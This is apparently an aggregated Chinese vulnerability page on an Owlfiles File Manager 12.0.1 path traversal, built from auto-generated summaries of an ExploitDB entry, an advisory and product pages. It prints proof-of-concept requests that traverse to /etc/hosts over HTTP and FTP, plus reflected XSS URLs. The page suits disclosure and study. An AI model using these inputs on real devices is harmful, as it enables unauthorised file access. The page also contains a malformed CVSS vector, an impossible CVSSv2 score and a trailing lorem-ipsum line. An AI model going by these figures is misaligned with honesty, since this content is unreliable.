# Owlfiles 12.0.1 路径遍历漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: Skyjos -- 🔗来源链接
标签:product
神龙速读:
从这个网页的截图中,我们无法直接获取明显的漏洞信息。不过,我们可以分析一下可能存在的潜在漏洞:
- **应用程序描述**:UltraNotes、Owlfiles、Photo Manager Pro 和 FE File Explorer Pro的功能描述可能暗示着可利用的漏洞,例如Owlfiles和FE File Explorer Pro可能涉及到文件操作,可能存在的漏洞包括目录遍历、文件上传等。
- **缺少安全声明**:通常在描述应用程序功能时,应该包含一些说明,指出应用程序是安全的,或经过了安全测试。例如,“我们的应用程序已经经过严格的安全测试,确保您的数据安全”
然而,更重要的是要指出,**这个截图实际上并未直接显示出任何漏洞**,提供的信息只能辅助进行进一步的探测和分析。如果您持有这个网站的授权进行测试,可以进一步使用相关的网络安全工具和技能进行漏洞发掘。
标题: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities - iOS webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:
### 关键漏洞信息
- **漏洞标题**: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
- **EDB-ID**: 51036
- **CVE**: N/A
- **作者**: CHOKRI HAMMEDI
- **类型**: WEBAPPS
- **平台**: iOS
- **发布日期**: 2023-03-23
- **易受攻击的应用**: Owlfiles File Manager 12.0.1
### 漏洞详情
#### 1. Path Traversal on HTTP built-in server
- **描述**: 在HTTP内置服务器上存在目录遍历漏洞。
- **例子**:
```
GET /../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
××××
HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT
××××
Content of /etc/hosts file
```
#### 2. LFI on HTTP built-in server
- **描述**: 在HTTP内置服务器上存在本地文件包含(LFI)漏洞。
- **例子**:
```
GET /../../../../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
××××
HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 03:28:14 GMT
××××
Content of /etc/hosts file
```
#### 3. Path Traversal on FTP built-in server
- **描述**: 在FTP内置服务器上存在目录遍历漏洞。
- **例子**:
```
ftp> cd /../../../../../../../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../../../../../../..
...
```
#### 4. XSS on HTTP built-in server
- **描述**: 在HTTP内置服务器上存在跨站脚本(XSS)漏洞。
- **例子**:
- `http://localhost:8080/download?path=<script>alert(1)</script>`
- `http://localhost:8080/list?path=<script>alert(1)</script>`
标题: Owlfiles - File Manager App - App Store -- 🔗来源链接
标签:product
神龙速读:
- **App Name:** Owlfiles - File Manager
- **Key Features:**
- Access SMB, WebDAV, FTP, and S3
- Manage files
- Connect servers, NAS and cloud storages
- Transfer files from anywhere to anywhere
- Sync files with computer, NAS
- **Ratings & Reviews:**
- Rating: 4.6 out of 5
- Reviews: 7K Ratings
- User Comments:
- Good experience, easy to use
- Excellent for Synology NAS
- **App Privacy:**
- Data Linked to You: Identifiers
- **Information:**
- Seller: Skyjos Co., Ltd.
- Size: 178.8 MB
- Category: Utilities
- Age Rating: 4+
- **Supports:**
- Family Sharing: In-app purchases and subscriptions may be shareable
- **Key Concerns:**
- The app handles data linked to your identity.
- Privacy practices may vary based on features and age.
- **Additional Insights:**
- Multiple apps by the same developer, indicating a focus on file management and transfer.
- Compatibility with various cloud services and storages may introduce additional vulnerabilities if not properly secured.
标题: Owlfiles File Manager 12.0.1 - Path Traversal | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
从该网页截图中可以获取到以下关于漏洞的关键信息:
### 关键信息总结
- **漏洞名称**: Owlfiles File Manager 12.0.1 - Path Traversal
- **漏洞严重性**: HIGH
- **发布日期**: January 13, 2026
- **受影响的软件版本**:
- Owlfiles File Manager 12.0.1
- **漏洞类型**:
- CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
- **CVSS 评分**:
- CVSSv3 Base Score: 9.1
- Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/SC:H/CI:H/II:H
- **CVSSv2**:
- 9.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- **相关链接**:
- CVE-2022-50890 [[Link]](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-50890)
- ExploitDB-51036 [[Link]](https://www.exploit-db.com/exploits/51036)
- Vendor Homepage [[Link]](VendorHomepageLink)
- Official App Store Listing [[Link]](OfficialAppStoreListingLink)
- **发现者**: Chokri Hammedi
- **漏洞描述**:
- Owlfiles File Manager 12.0.1 的内置 HTTP 服务器中存在路径遍历漏洞,允许攻击者访问系统目录。攻击者可以通过构造包含目录遍历序列的 GET 请求来利用该漏洞访问受限的系统目录。
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.